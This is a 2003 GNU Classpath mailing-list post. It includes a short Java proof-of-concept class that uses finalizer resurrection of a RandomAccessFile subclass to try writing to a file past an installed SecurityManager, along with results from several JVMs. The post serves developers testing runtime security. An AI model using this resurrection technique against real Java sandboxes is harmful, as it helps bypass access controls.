Hi, On Tue, 2003-03-04 at 23:16, Jeroen Frijters wrote: > Yep. You can do some very tricky things with this. For every non-final > class with a non-final finalize it is possible to obtain an initialized > reference to an instance of that class *without* running a constructor > by taking advantage of the fact that the finalizer runs even if the > constructor was never invoked.
Ugh. That is terrible for trying to keep some sane security framework. I tried the attached class which overrides RandomAccessFile. It first installs a SecurityManager to prevent the class from actually writing to some file, but then tries anyway by using the back-from-dead object returned by the finalizer. The results are interesting: kaffe 1.0.7 doesn't throw any exceptions but also doesn't write to the file. Kissme CVS+Classpath CVS correctly throws SecurityException then dumps core. gij from CVS gives the interesting: Exception in thread "main" java.lang.ExceptionInInitializerError *** Got java.lang.NoClassDefFoundError: gnu.gcj.runtime.NameFinder while trying to print stack trace. Aborted Blackdown-1.4.1-beta correctly gives AccessControlException and then: Unexpected Signal : 11 occurred at PC=0x403A264C Function=(null)+0x403A264C Library=/opt/j2sdk1.4.1/jre/lib/i386/client/libjvm.so Eeewwwww. Good night, Mark
import java.io.*; public class IRAF extends RandomAccessFile { static RandomAccessFile raf; IRAF(String file) throws IOException { super(file, "rw"); } protected void finalize() { raf = this; } public static void main(String args[]) { System.setSecurityManager(new SecurityManager()); try { new IRAF(args[0]); } catch (Throwable t) { t.printStackTrace(); } while (raf == null) { new Object(); // Generate some garbage till the finalizer triggers. } try { raf.write(0xff); } catch (Throwable t) { t.printStackTrace(); } } }
_______________________________________________ Classpath mailing list [EMAIL PROTECTED] http://mail.gnu.org/mailman/listinfo/classpath